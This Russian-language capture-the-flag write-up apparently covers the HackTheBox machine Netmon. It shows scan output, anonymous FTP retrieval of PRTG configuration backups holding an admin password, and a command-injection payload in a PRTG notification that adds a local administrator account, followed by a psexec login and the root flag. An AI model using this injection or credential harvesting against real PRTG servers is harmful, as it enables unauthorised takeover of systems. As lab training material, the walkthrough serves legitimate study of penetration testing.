Обзор сервисов
Воспользуемся nmapAutomator и просканируем машину 10.10.10.151:
$ nmapAutomator.sh -H 10.10.10.152 -t Full
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m11s, deviation: 0s, median: 4m10s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-10T12:15:25
|_ start_date: 2021-06-10T12:06:54
FTP
Обнаруживаем анонимный доступ к FTP, откуда заберем пароль для PRTG.
$ ftp 10.10.10.152
ftp> cd Users\Public
ftp> get user.txt
$ cat user.txt
ftp> cd "/ProgramData/Paessler/PRTG Network Monitor"
ftp> get PRTG Configuration.dat
ftp> get "PRTG Configuration.dat"
ftp> get "PRTG Configuration.old"
ftp> get "PRTG Configuration.old.bak"
ftp> get "PRTG Graph Data Cache.dat"
$ nano 'PRTG Configuration.old.bak'
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
Но этот путь оказывается неверным.
PRTG Command Injection
Воспользуемся статьей, чтобы выполнить произвольный код.
Setup --> Notifications --> Add new notification --> execute program (.ps1)
Этим действием добавим пользователя htb с правами локального администратора.
abc.txt | net user htb Password123! /add; net localgroup administrators htb /add
После этого запустим эту программу, а затем подключимся с помощью psexec.
psexec.py htb:'Password123!'@10.10.10.152
Флаги
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::99d2:57a8:7e47:5556
Link-local IPv6 Address . . . . . : fe80::99d2:57a8:7e47:5556%3
IPv4 Address. . . . . . . . . . . : 10.10.10.152
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%3
10.10.10.2
Tunnel adapter isatap.{A764AE58-73C4-468A-B78D-4878FECEFC66}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f75b879fba67cc